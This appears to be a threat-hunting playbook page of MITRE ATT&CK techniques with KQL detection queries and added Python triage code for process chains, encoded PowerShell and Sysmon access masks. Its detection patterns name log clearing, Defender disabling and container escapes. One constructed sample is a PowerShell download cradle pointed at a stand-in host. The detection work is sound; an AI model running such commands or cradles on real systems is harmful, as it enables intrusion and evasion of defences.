KQLAzure - Conditional Access policy tampering
event.dataset: "azure.auditlogs" AND event.action: ("Update policy" OR "Delete policy") AND event.category: "Policy"
T1611

Escape to Host

[MITRE]
Adversaries escape container isolation (Docker/K8s) to gain root on the underlying host, exploiting --privileged containers, mounted host filesystems, or access to the Docker socket (/var/run/docker.sock).
KQLLinux - chroot or nsenter used to break into host namespace
process.name: ("chroot" OR "nsenter") AND process.command_line: ("*/host*" OR "*-t 1 -m -u -n -i*")
T1068

Exploitation for Privilege Escalation

[MITRE]
Adversaries exploit kernel, driver, or privileged service vulnerabilities (PrintNightmare, PrintSpoofer, ZeroLogon) to elevate from standard user to SYSTEM/root without stealing credentials.
KQLSysmon - Print Spooler spawning interactive shell (PrintNightmare)
process.parent.name: "spoolsv.exe" AND process.name: ("cmd.exe" OR "powershell.exe" OR "rundll32.exe" OR "whoami.exe")
KQLSysmon - vulnerable drivers loaded from user-writable paths (BYOVD)
winlog.event_id: 6 AND file.path: ("*\\Temp\\*.sys" OR "*\\AppData\\*.sys" OR "*\\Users\\Public\\*.sys")
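Several cards on this page are the same hunt with different names in the parent and child slots: web server spawning a shell (T1505.003), document reader spawning a shell (T1203), cloud agent spawning a shell (T1651), SCCM/Intune agent spawning a shell (T1072), and the Print Spooler card just above (T1068). The following is an added example, not the playbook's code, that keeps those pairings in one table and runs them over process-creation events in either ECS/Winlogbeat or raw Sysmon field names, the translation the Field Mapping section at the top of the playbook describes. The rule pairs are transcribed from the cards' queries; the events are constructed.

```python
"""Parent/child process hunts from several cards, run over constructed events.

Added example, not the playbook's own code. Rules are transcribed from the
cards' KQL; events may carry ECS (Elastic/Winlogbeat) or raw Sysmon field names.
"""

# technique -> (parent process names, child process names), all lower-case
PARENT_CHILD_RULES = {
    "T1505.003 web shell": (
        {"w3wp.exe", "httpd.exe", "nginx.exe", "php.exe", "php-cgi.exe", "tomcat.exe"},
        {"cmd.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "wmic.exe", "wscript.exe"}),
    "T1203 client exploit": (
        {"acrord32.exe", "acrobat.exe", "foxitreader.exe", "winword.exe"},
        {"cmd.exe", "powershell.exe", "certutil.exe", "rundll32.exe"}),
    "T1651 cloud agent": (
        {"amazon-ssm-agent.exe", "waappagent.exe"},
        {"cmd.exe", "powershell.exe"}),
    "T1072 deployment tool": (
        {"ccmexec.exe", "intunemanagementextension.exe"},
        {"powershell.exe", "cmd.exe", "wscript.exe"}),
    "T1068 print spooler": (
        {"spoolsv.exe"},
        {"cmd.exe", "powershell.exe", "rundll32.exe", "whoami.exe"}),
}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def normalise_event(ev: dict) -> dict:
    """Map ECS or raw-Sysmon fields onto one shape (see the Field Mapping section)."""
    if "process" in ev:                                        # ECS
        proc = ev["process"]
        parent = proc.get("parent", {})
        return {
            "host": ev.get("host", {}).get("name", ""),
            "parent": (parent.get("name") or _basename(parent.get("executable", ""))).lower(),
            "child": (proc.get("name") or _basename(proc.get("executable", ""))).lower(),
            "command_line": proc.get("command_line", ""),
        }
    return {                                                   # raw Sysmon event 1
        "host": ev.get("Computer", ""),
        "parent": _basename(ev.get("ParentImage", "")).lower(),
        "child": _basename(ev.get("Image", "")).lower(),
        "command_line": ev.get("CommandLine", ""),
    }


def match_parent_child(events: list[dict]) -> list[dict]:
    """Return one hit per event whose parent/child pair matches a rule."""
    hits = []
    for ev in events:
        n = normalise_event(ev)
        for technique, (parents, children) in PARENT_CHILD_RULES.items():
            if n["parent"] in parents and n["child"] in children:
                hits.append({"technique": technique, **n})
                break                                          # first matching rule wins
    return hits


SAMPLE_EVENTS = [   # constructed
    {"host": {"name": "WEB-01"}, "process": {"name": "cmd.exe", "command_line": "cmd.exe /c whoami",
                                             "parent": {"name": "w3wp.exe"}}},
    {"Computer": "PRINT-01", "ParentImage": "C:\\Windows\\System32\\spoolsv.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden"},
    {"host": {"name": "WS-042"}, "process": {"name": "cmd.exe", "command_line": "cmd.exe",
                                             "parent": {"name": "explorer.exe"}}},
    # ECS event with executables only, no process.name fields
    {"host": {"name": "WS-042"}, "process": {"executable": "C:\\Windows\\System32\\cmd.exe",
                                             "command_line": "cmd.exe /c start",
                                             "parent": {"executable": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}}},
    # IIS compiling an ASP.NET page: web-server parent, but csc.exe is not a shell
    {"Computer": "WEB-01", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe", "CommandLine": "csc.exe /noconfig"},
]

if __name__ == "__main__":
    for hit in match_parent_child(SAMPLE_EVENTS):
        print(hit["technique"], hit["host"], hit["parent"], "->", hit["child"])
```

Matching on the file name of the executable rather than the full path is what lets one table serve both log shapes; the cost is that a renamed binary slips past, so pair this with the code-signature fields when your EDR exposes them.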
T1078

Valid Accounts (Privilege Escalation)

[MITRE]
The simplest privilege escalation: finding credentials for an already-privileged account (in cleartext scripts, wikis, or via credential dumping) and logging in directly. "Why exploit when you can log in?"
KQLWindows - runas.exe used to execute under admin context
process.name: "runas.exe" AND process.command_line: "* /user:*" AND (process.command_line: "*admin*" OR process.command_line: "*root*")
Defense Evasion TA0005
Techniques adversaries use to avoid detection. Includes a wide range of techniques to avoid security tools, clear evidence of their presence, and blend into normal activity.
T1027

Obfuscated Files or Information

[MITRE]
KQLBase64-encoded command lines in PowerShell or CMD
process.name: (powershell.exe OR cmd.exe) AND process.command_line: *base64*
process.name: powershell.exe AND process.command_line: (*-ec* OR *-e* OR *-en*)   -- *-e* also matches -ep and -exec, so expect noise
process.name: cmd.exe AND process.command_line: (*\^* OR *\=* OR *\%* OR *\!* OR *\[* OR *\(* OR *\;*)
KQLKnown packers/compressors - UPX, MPRESS, morphine
process.name: (upx.exe OR mpress.exe OR exepacker.exe OR morphine.exe)
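The encoded-command queries above find the switch but leave the payload opaque, and the `*-e*` wildcard is noisy because powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...). The following is an added example, not the playbook's code, that resolves the switch by prefix match exactly as the parser does, base64-decodes the UTF-16LE payload, and lists the download-cradle markers found in the clear text. The marker list and the sample command lines are constructed; the `-e SQBFAFgA` sample decodes to `IEX`.

```python
"""Decode PowerShell -EncodedCommand payloads found in process command lines.

Added example, not the playbook's own code. powershell.exe accepts any
unambiguous prefix of -EncodedCommand, which the prefix test below mirrors;
the marker list and sample command lines are constructed.
"""
import base64
import binascii

CRADLE_MARKERS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                  "net.webclient", "invoke-webrequest", "frombase64string",
                  "-join", "[char]", "bypass")


def encode_powershell(script: str) -> str:
    """UTF-16LE then base64: the encoding powershell.exe expects (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def find_encoded_argument(command_line: str):
    """Base64 token following an -EncodedCommand switch (any prefix), or None."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] not in "-/":
            continue
        switch = tok[1:].lower()
        # '-e', '-ec', '-enc' all resolve to -Encod edCommand; '-ep' and '-exec' do not
        if switch and "encodedcommand".startswith(switch):
            return tokens[i + 1].strip("\"'")
    return None


def decode_encoded_command(command_line: str):
    """Clear-text script from an encoded command line, or None if there is none."""
    payload = find_encoded_argument(command_line)
    if payload is None:
        return None
    payload += "=" * (-len(payload) % 4)               # tolerate stripped padding
    try:
        raw = base64.b64decode(payload, validate=True)
    except (binascii.Error, ValueError):
        return None                                    # switch present, payload not base64
    return raw.decode("utf-16-le", errors="replace")


def triage_command_line(command_line: str) -> dict:
    """Decode and tag a command line; indicators are markers seen in the clear text."""
    decoded = decode_encoded_command(command_line)
    indicators = [] if decoded is None else [m for m in CRADLE_MARKERS if m in decoded.lower()]
    return {"encoded": decoded is not None, "decoded": decoded, "indicators": indicators}


# constructed samples: a hand-checked short payload and a classic cradle shape
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -e SQBFAFgA",
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc "
    + encode_powershell("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1",
]

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES:
        print(triage_command_line(line))
```

The prefix test is what removes the `*-e*` noise: `-ep` and `-exec` are not prefixes of `encodedcommand`, so only real encoded invocations reach the decoder. Run the decoded text back through the same function when it is itself a nested `powershell -e` invocation.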
T1036

Masquerading

[MITRE]
KQLforfiles.exe invoked from non-default location to spawn cmd (masquerading)
((ParentCommandLine: (*.exe OR *.exe")) AND Image: *\\cmd.exe AND CommandLine: \/c\ echo\ "*) AND NOT ((ParentImage: (*\:\\Windows\\System32\\* OR *\:\\Windows\\SysWOW64\\*)) AND ParentImage: *\\forfiles.exe AND Image: *\\cmd.exe)
T1070

Indicator Removal on Host

[MITRE]
KQLPowerShell history cleared (console history removal)
event.action: "start" AND process.name: (powershell.exe OR pwsh.exe OR powershell_ise.exe) AND (process.args: "*Clear-History*" OR (process.args: ("*Remove-Item*" OR *rm) AND process.args: ("*ConsoleHost_history.txt*" OR "*(Get-PSReadlineOption).HistorySavePath*")))
KQLEventLog disabled via logman, PowerShell, or auditpol
event.type: ("start" OR "process_started") AND ((process.name: "logman.exe" AND process.args: "EventLog-*" AND process.args: ("stop" OR "delete")) OR (process.name: "powershell.exe" AND process.args: "Set-Service" AND process.args: "EventLog" AND process.args: "Disabled") OR (process.name: "auditpol.exe" AND process.args: "/success:disable"))
KQLT1070.001 - Event log cleared (event 1102 or wevtutil)
event.code: 1102 OR event.action: "Log clear"
"wevtutil cl"
process.name: wevtutil.exe AND process.args: (cl OR clear-log OR set-log OR sl OR lfn)
event.category: process AND event.type: (start OR process_started) AND process.name: wevtutil.exe AND process.args: cl
KQLT1070.004 - File deletion using sdelete or Remove-Item
process.name: (sdelete64.exe OR sdelete.exe)
process.name: (del.exe OR rmdir.exe)
process.name: powershell.exe AND process.command_line: *Remove-Item*
T1112

Modify Registry

[MITRE]
KQLSuspicious registry modifications to Run keys
process.name: "reg.exe" AND process.args: ("add" OR "set" OR "delete") AND (process.args: "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run*" OR process.args: "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce*")
InfoKey registry paths commonly targeted by adversaries
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools
T1140

Deobfuscate/Decode Files or Information

[MITRE]
KQLCertUtil used for encoding/decoding - common LOLBin abuse
process.name: certutil.exe AND process.command_line: (*decode* OR *urlcache* OR *encode* OR *encodehex* OR *decodehex* OR *exportPFX*)
host.os.type: "windows" AND event.type: "start" AND process.name: "certutil.exe"
KQLReflective PE injection via PowerShell
event.id: 1 AND command.line: "*Invoke-ReflectivePEInjection*"
KQLArchive/compression tools used to decode payloads
process.name: (zip* OR rar* OR 7zip* OR winzip* OR winrar* OR ziparchiver* OR peazip*)
T1218

System Binary Proxy Execution

[MITRE]
KQLmshta.exe with incoming network connection (DCOM/HTA lateral movement)
event.type: "start" AND process.name: "mshta.exe" AND network.direction: "incoming" AND network.transport: "tcp" AND source.port > 49151 AND destination.port > 49151 AND NOT source.address: ("127.0.0.1" OR "::1")
KQLT1218.001 CHM - hh.exe loading .chm file
process.name: hh.exe AND process.command_line: *.chm*
KQLT1218.011 Rundll32 - possibly executing malicious DLLs or JavaScript
process.name: rundll32.exe AND process.command_line: *Start*
process.name: rundll32.exe AND process.command_line: *javascript*
process.name: rundll32.exe   -- broad, may have many hits; triage by parent/user
T1562

Impair Defenses

[MITRE]
KQLDisabling PowerShell Script Block Logging via registry
event.type: "change" AND registry.path: "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging" AND registry.data.strings: ("0" OR "0x00000000")
KQLT1562.001 - Windows Defender disabled via sc.exe
event.code: 4688 AND process.name: sc.exe AND process.args: (config OR stop OR query)
event.code: 7036 AND (("Windows Defender" OR "Windows Firewall") AND "stopped")
KQLDefender disabled via PowerShell or registry
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" AND "DisableAntiSpy"
powershell AND Set-ItemProperty AND "Windows Defender" AND DisableAntiSpyware
"MpCmdRun" AND "RevertPlatform"
KQLSet-MpPreference disabling script scanning (Windows AV evasion)
"Set-MpPreference -DisableScriptScanning"   -- Windows
"setenforce 0"                               -- Linux (disables SELinux)
T1564

Hide Artifacts

[MITRE]
[KQL] Alternate Data Stream creation on common file types
event.type: "creation" AND file.path: "C:\\*:*" AND NOT file.path: "C:\\*:zone.identifier*" AND file.extension: ("pdf" OR "dll" OR "png" OR "exe" OR "dat" OR "com" OR "bat" OR "cmd" OR "sys" OR "vbs" OR "ps1" OR "hta" OR "txt" OR "js" OR "docx" OR "doc" OR "xlsx" OR "xls")
[KQL] T1564.001 — Hidden files and directories via registry
process.name: reg.exe AND process.command_line: (*ShowSuperHidden* OR *Hidden*)
registry.path: (*Hidden* OR *hidden*)
T1599

Network Boundary Bridging

[MITRE]

What to look for: Unauthorized configuration changes, new routes added, anomalous connections between enclaves that shouldn't communicate.

[Info] Manual review checklist for network boundary bridging
- Review firewall rules for unauthorized changes
- Check router settings for newly added/modified routes
- Look for traffic between networks that shouldn't communicate
- Monitor unusually high traffic volumes on specific ports
- View traffic flowing in/out from boundary devices
- Monitor for unauthorized communication between enclaves
T1055

Process Injection

[MITRE]
Adversaries inject code into processes to evade process-based defenses and potentially elevate privileges. Malicious code may be run under a legitimate process to blend into normal activity. (Also see Privilege Escalation.)
[KQL] Sysmon Ev10: Process access (common for injection — OpenProcess with PROCESS_VM_WRITE)
event.code: 10 AND winlog.event_data.GrantedAccess: ("0x1fffff" OR "0x1f1fff" OR "0x143a" OR "0x40" OR "0x1000")
event.code: 10 AND target.process.name: (lsass.exe OR svchost.exe OR explorer.exe)
[KQL] Unusual parent-child relationships indicating process hollowing or injection
process.parent.name: (svchost.exe OR services.exe) AND process.name: (cmd.exe OR powershell.exe OR wscript.exe OR cscript.exe)
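The GrantedAccess values in the Ev10 query above are bit masks of PROCESS_* rights; decoding them tells you whether a handle could write and execute in the target (injection) or only read it (dumping). The following decoder and triage routine is an added example, not part of the playbook; the LSASS allowlist and the sample events are constructed placeholders to tune per environment.

```python
"""Decode the Sysmon Event ID 10 (ProcessAccess) GrantedAccess mask and triage
the handle the way the Process Injection card does: rights that allow writing
memory or creating threads in another process are the injection signal, rights
that allow reading LSASS memory are the credential-dump signal."""
from dataclasses import dataclass

# PROCESS_* rights from winnt.h; the low 16 bits are process-specific rights,
# the upper bits are standard rights shared by all securable objects.
ACCESS_RIGHTS = {
    0x000001: "TERMINATE",
    0x000002: "CREATE_THREAD",
    0x000008: "VM_OPERATION",
    0x000010: "VM_READ",
    0x000020: "VM_WRITE",
    0x000040: "DUP_HANDLE",
    0x000080: "CREATE_PROCESS",
    0x000100: "SET_QUOTA",
    0x000200: "SET_INFORMATION",
    0x000400: "QUERY_INFORMATION",
    0x000800: "SUSPEND_RESUME",
    0x001000: "QUERY_LIMITED_INFORMATION",
    0x002000: "SET_LIMITED_INFORMATION",
    0x010000: "DELETE",
    0x020000: "READ_CONTROL",
    0x040000: "WRITE_DAC",
    0x080000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE",
}
PROCESS_ALL_ACCESS = 0x1FFFFF

# Rights an injector needs (write code, then run it) vs. what a dumper needs.
INJECTION_RIGHTS = {"VM_WRITE", "VM_OPERATION", "CREATE_THREAD"}
DUMP_RIGHTS = {"VM_READ"}

# Placeholder allowlist of images that legitimately open LSASS; tune per site.
LSASS_ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe"}


def decode_granted_access(mask):
    """Turn '0x143a' (or an int) into the list of PROCESS_* right names."""
    value = int(mask, 16) if isinstance(mask, str) else int(mask)
    if value & PROCESS_ALL_ACCESS == PROCESS_ALL_ACCESS:
        return ["ALL_ACCESS"]
    return [name for bit, name in ACCESS_RIGHTS.items() if value & bit]


@dataclass
class ProcessAccessEvent:
    """The Event ID 10 fields this triage needs (names as Sysmon writes them)."""
    source_image: str
    target_image: str
    granted_access: str
    call_trace: str = ""


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return (severity, reason) for one ProcessAccess event."""
    rights = set(decode_granted_access(event.granted_access))
    full = "ALL_ACCESS" in rights
    can_inject = full or bool(rights & INJECTION_RIGHTS)
    can_read = full or bool(rights & DUMP_RIGHTS)
    source = _basename(event.source_image)
    target = _basename(event.target_image)
    # Frames from memory not backed by a file (Sysmon prints them as UNKNOWN(addr))
    # mean the caller itself is running injected or unpacked code.
    unbacked = "UNKNOWN(" in event.call_trace

    if target == "lsass.exe":
        if source in LSASS_ALLOWLIST and not unbacked:
            return ("info", "allowlisted LSASS reader")
        if can_inject:
            return ("high", "write/thread access to LSASS")
        if can_read:
            return ("high", "LSASS memory read (credential dump pattern)")
        return ("low", "LSASS query-only access")
    if can_inject and unbacked:
        return ("high", "injection-capable access from unbacked code")
    if can_inject:
        return ("medium", "injection-capable access; check parent and signer")
    return ("info", "no write or thread rights granted")


# Constructed sample events (not real telemetry) covering the card's mask values.
SAMPLE_EVENTS = [
    ProcessAccessEvent(r"C:\Users\Public\tool.exe", r"C:\Windows\System32\lsass.exe",
                       "0x1010", r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|C:\Windows\System32\KERNELBASE.dll+2bd0e"),
    ProcessAccessEvent(r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
                       r"C:\Windows\System32\lsass.exe", "0x1fffff"),
    ProcessAccessEvent(r"C:\Users\alice\AppData\Local\Temp\loader.exe",
                       r"C:\Windows\explorer.exe", "0x143a",
                       r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|UNKNOWN(00000000023F1234)"),
    ProcessAccessEvent(r"C:\Windows\System32\taskmgr.exe", r"C:\Windows\System32\svchost.exe", "0x1000"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        sev, why = triage(ev)
        print(f"{sev:6} {_basename(ev.source_image):>12} -> {_basename(ev.target_image):<12} "
              f"{ev.granted_access:>8} {decode_granted_access(ev.granted_access)}  {why}")
```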
T1197

BITS Jobs

[MITRE]
Adversaries abuse Windows Background Intelligent Transfer Service (BITS) to download payloads, persist, or execute commands while evading detection — BITS jobs survive reboots and run as a trusted Windows service. (Also see Persistence.)
[KQL] BITSAdmin download/transfer — primary LOLBin abuse for evasion
process.name: bitsadmin.exe AND process.command_line: (*transfer* AND *Download*)
process.name: bitsadmin.exe AND process.command_line: *transfer*
bitsadmin AND (Transfer OR Create OR AddFile OR SetNotifyFlags OR SetNotifyCmdLine OR SetMinRetryDelay OR SetCustomHeaders OR Resume)
[KQL] PowerShell Start-BitsTransfer (evasion via trusted BITS mechanism)
process.name: powershell.exe AND process.command_line: *Start-BitsTransfer*
[KQL] BITS job lifecycle event IDs (requires the BITS-Client operational event log)
event.code: (59 OR 60 OR 61)
-- Microsoft-Windows-Bits-Client/Operational: 59 = transfer started (job name and URL in the event), 60 and 61 = transfer stopped (status code in the event)
T1070.001

Indicator Removal: Clear Windows Event Logs

[MITRE]
Adversaries clear Windows event logs to remove evidence of their activity. Event ID 1102 is logged when the Security log is cleared — itself an alert.
[KQL] Security audit log cleared (Ev1102) or log clear action
event.code: 1102 OR event.action: "Log clear"
[KQL] wevtutil clearing event logs via command line
process.name: wevtutil.exe AND process.command_line: (*clear-log* OR * cl * OR *set-log* OR * sl * OR *lfn*)
process.command_line: *wevtutil cl*
-- Common: wevtutil cl system  wevtutil cl application  wevtutil cl security
[KQL] PowerShell or WMI clearing event logs
process.name: (powershell.exe OR pwsh.exe) AND process.command_line: (*Clear-EventLog* OR *Clear-WinEvent*)
process.name: wmic.exe AND process.command_line: *ClearEventLog*
T1070.004

Indicator Removal: File Deletion

[MITRE]
Adversaries delete files to remove evidence of their activity — malware, scripts, staging directories, or downloaded tools after use.
[KQL] Secure delete (sdelete) — adversaries use this to make recovery difficult
process.name: (sdelete.exe OR sdelete64.exe)
[KQL] del/rmdir or PowerShell Remove-Item used to delete suspicious files
process.name: cmd.exe AND process.command_line: ("* del *" OR "* erase *" OR "* rmdir *" OR "* rd *")
-- del, erase, rmdir and rd are cmd.exe built-ins: they never appear as process.name, only inside cmd.exe's command line
process.name: powershell.exe AND process.command_line: *Remove-Item*
T1218.001

System Binary Proxy Execution: Compiled HTML File (HH.exe)

[MITRE]
Adversaries abuse HH.exe (HTML Help) to execute malicious .chm files, which can contain embedded scripts. This bypasses application whitelisting as HH.exe is a signed Microsoft binary.
[KQL] HH.exe loading a CHM file — flag any CHM from unusual path or network
process.name: hh.exe AND process.command_line: *.chm*
T1218.011

System Binary Proxy Execution: Rundll32

[MITRE]
Adversaries use rundll32.exe to proxy execution of malicious DLLs or scripts (including JavaScript) to bypass application whitelisting. High volume of legitimate rundll32 makes detection noisy.
[KQL] Rundll32 with Start export — common malware execution pattern
process.name: rundll32.exe AND process.command_line: *Start*
[KQL] Rundll32 executing JavaScript (alternate data stream or script abuse)
process.name: rundll32.exe AND process.command_line: *javascript*
[KQL] Any rundll32 execution — high volume expected, filter by parent or path
process.name: rundll32.exe
-- Tune: exclude known-good paths (e.g., C:\Windows\System32\shell32.dll)
T1562.001

Impair Defenses: Disable or Modify Tools

[MITRE]
Adversaries disable or modify security tools (AV, EDR, Windows Defender, firewall) to avoid detection. Common methods include service stop commands, registry edits, and PowerShell cmdlets.
[KQL] PowerShell disabling Windows Defender script scanning or antispyware
process.command_line: *Set-MpPreference* AND process.command_line: *Disable*
process.name: powershell.exe AND process.command_line: *Set-ItemProperty* AND process.command_line: *DisableAntiSpyware*
[KQL] sc.exe stopping/configuring Windows Defender or Firewall services
event.code: 4688 AND process.name: sc.exe AND process.args: (config OR stop OR query)
[KQL] Security service stopped (Ev7036) — Defender or Firewall service stopped
event.code: 7036 AND winlog.event_data.param1: ("Windows Defender*" OR "Windows Firewall*") AND winlog.event_data.param2: "stopped"
[KQL] Defender policy registry keys modified to disable protection
registry.path: ("HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender*" OR "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers*")
registry.path: *DisableAntiSpy*
[KQL] MpCmdRun reverting Defender platform definitions
process.name: MpCmdRun.exe AND process.command_line: *RevertPlatform*
T1564.001

Hide Artifacts: Hidden Files and Directories

[MITRE]
Adversaries set the hidden attribute on files and directories to conceal malicious tools or data from casual inspection by users or basic directory listings.
[KQL] reg.exe modifying ShowSuperHidden or Hidden attribute settings
process.name: reg.exe AND process.command_line: (*ShowSuperHidden* OR *Hidden*)
[KQL] Registry paths containing hidden attribute configuration
registry.path: (*Hidden* OR *SuperHidden*)
T1574.001

Hijack Execution Flow: DLL Search Order Hijacking

[MITRE]
Adversaries plant malicious DLLs in locations searched before the legitimate DLL path, causing legitimate processes to load attacker code — evading detection while running under a trusted process. (Also see Persistence and Privilege Escalation.)
[KQL] Untrusted/unsigned DLL loaded using commonly hijacked DLL names
(event.category: "library" OR (event.category: "process" AND event.action: "Image loaded*")) AND
(dll.name: ("wlbsctrl.dll" OR "wbemcomn.dll" OR "WptsExtensions.dll" OR "wow64log.dll" OR
            "WindowsCoreDeviceInfo.dll" OR "Ualapi.dll" OR "wlanhlp.dll" OR "phoneinfo.dll" OR
            "EdgeGdi.dll" OR "cdpsgshims.dll" OR "diagtrack_win.dll") AND
 (dll.code_signature.trusted: false OR dll.code_signature.exists: false))
T1548

Abuse Elevation Control Mechanism

[MITRE]
Adversaries bypass UAC silently using auto-elevating trusted binaries (fodhelper.exe, computerdefaults.exe) to execute payloads without triggering a user prompt — preventing the user and behavioral analytics from detecting unauthorized admin actions.
[KQL] Sysmon — UAC bypass binaries spawning interpreters
process.parent.name: ("fodhelper.exe" OR "computerdefaults.exe" OR "sdclt.exe" OR "slui.exe") AND process.name: ("cmd.exe" OR "powershell.exe" OR "rundll32.exe")
T1134

Access Token Manipulation (Defense Evasion)

[MITRE]
Adversaries evade identity-based detections by adopting another logged-on user's access token — making malicious actions appear to come from a legitimate administrator in audit logs.
[KQL] Windows — Logon Type 9 for network-only token impersonation
winlog.event_id: 4624 AND winlog.logon.type: 9 AND event.outcome: "success"
T1612

Build Image on Host

[MITRE]
Adversaries build malicious container images directly on compromised production hosts using docker build, bypassing central registry scanners since the image never passes through the organization's registry.
[KQL] Linux — container image builds on production nodes (not build runners)
process.name: ("docker" OR "buildah" OR "podman") AND process.command_line: "* build *" AND NOT host.hostname: "*build-runner*"
T1622

Debugger Evasion

[MITRE]
Adversaries check if malware is running inside a debugger, sandbox, or EDR emulator (using IsDebuggerPresent, timing checks, or looking for analysis tools) — if detected, malware stops executing to evade detection and analysis.
[KQL] Sysmon — processes reading memory of known analysis tools
winlog.event_id: 10 AND winlog.event_data.TargetImage: ("*\\wireshark.exe" OR "*\\sysmon.exe" OR "*\\x64dbg.exe")
T1678

Delay Execution

[MITRE]
Adversaries program malware to sleep for 10+ minutes to outlast automated sandbox analysis (which typically runs 3-5 minutes) — the sandbox marks it clean, then malware executes on the real endpoint.
[KQL] Sysmon — ping localhost used as a delay loop
process.name: "ping.exe" AND process.command_line: ("*-n 60*" OR "*-n 100*") AND process.command_line: ("*127.0.0.1*" OR "*localhost*")
T1610

Deploy Container (Defense Evasion)

[MITRE]
Adversaries deploy privileged containers to evade host-based EDR visibility — an EDR on the host OS may not have visibility into processes executing inside an isolated Docker container.
[KQL] Linux — containers deployed with --privileged or host filesystem mounted
process.name: "docker" AND process.command_line: "* run *" AND process.command_line: ("*--privileged*" OR "*--net=host*" OR "*-v /:*")
T1006

Direct Volume Access

[MITRE]
Adversaries read raw disk sectors (\\.\C:) to bypass OS file locking and copy locked files like NTDS.dit or SAM — completely evading file-access auditing since they bypass the OS file API.
[KQL] Sysmon — VSS creation to access locked credential files
process.name: "vssadmin.exe" AND process.command_line: ("* create shadow *" OR "*ntds.dit*")
[KQL] Sysmon — raw disk access (Event ID 9)
winlog.event_id: 9 AND winlog.event_data.Device: "\\Device\\HarddiskVolume*"
T1484

Domain or Tenant Policy Modification (Defense Evasion)

[MITRE]
Adversaries modify GPOs to add Defender exclusions for malware paths across all workstations, or disable Azure AD Conditional Access policies — degrading defenses at enterprise scale with a single change.
[KQL] Windows — GPO modifications targeting security extension names
winlog.event_id: 5136 AND winlog.event_data.ObjectClass: "groupPolicyContainer" AND winlog.event_data.AttributeLDAPDisplayName: "gPCMachineExtensionNames"
T1672

Email Spoofing

[MITRE]
Adversaries forge sender addresses to evade email gateways, abusing missing or misconfigured SPF/DKIM/DMARC to make emails appear to come from the CEO or IT Support.
[KQL] O365 — internal domain emails failing SPF/DMARC
event.dataset: "o365.message_trace" AND source.domain: "yourcompany.com" AND (email.auth.spf.status: "fail" OR email.auth.dmarc.status: "fail")
T1480

Execution Guardrails

[MITRE]
Adversaries compile malware to only decrypt/execute if specific environmental conditions match the target (domain name, MAC OUI, SID). If analyzed in a sandbox with wrong conditions, malware exits cleanly — appearing benign to vendors.
[KQL] Sysmon — reconnaissance commands before payload execution (guardrail checks)
process.name: ("whoami.exe" OR "nltest.exe" OR "ipconfig.exe") AND process.parent.name: ("WINWORD.EXE" OR "EXCEL.EXE" OR "AcroRd32.exe")
T1211

Exploitation for Defense Evasion

[MITRE]
Adversaries exploit vulnerabilities in security software (AV, EDR, firewalls) specifically to crash the tool, blind the SIEM, or execute malware under the trusted security vendor process context.
[KQL] Sysmon — security software spawning anomalous child processes (exploit)
process.parent.name: ("MsMpEng.exe" OR "csfalcon.exe" OR "TaniumClient.exe" OR "cb.exe") AND process.name: ("cmd.exe" OR "powershell.exe" OR "whoami.exe")
T1222

File and Directory Permissions Modification

[MITRE]
Adversaries modify ACLs to lock defenders out of malware storage directories, or loosen permissions on restricted system files — using icacls, takeown, chmod, or chattr.
[KQL] Sysmon — icacls granting Everyone full control
process.name: ("icacls.exe" OR "takeown.exe") AND process.command_line: ("*/grant Everyone:F*" OR "*/f *")
KQLLinux โ€” chmod/chown on /etc/shadow or /etc/passwd
process.name: ("chmod" OR "chown") AND process.command_line: ("* /etc/shadow*" OR "* /etc/passwd*")
T1656

Impersonation

[MITRE]
Adversaries impersonate trusted persons or entities — renaming malicious processes to match usernames, or spoofing administrator identity — to trick analysts or automated systems into trusting the action.
[KQL] Windows — explicit credential use (runas) impersonating admin accounts
winlog.event_id: 4648 AND process.name: "runas.exe" AND winlog.event_data.TargetUserName: ("Administrator" OR "*admin*")
T1202

Indirect Command Execution

[MITRE]
Instead of running cmd.exe directly, adversaries use built-in Windows utilities (pcalua.exe, forfiles.exe, bash.exe via WSL) to proxy execution — breaking parent-child process chains and bypassing AppLocker.
[KQL] Sysmon — built-in Windows binaries used to proxy command execution
process.name: ("pcalua.exe" OR "forfiles.exe" OR "syncappvpublishingserver.exe") AND process.command_line: ("*-a*" OR "*/c*" OR "*cmd.exe*")
T1556

Modify Authentication Process (Defense Evasion)

[MITRE]
Adversaries modify authentication binaries to prevent the system from logging failed authentication attempts, blinding the SIEM to brute force or lateral movement activity.
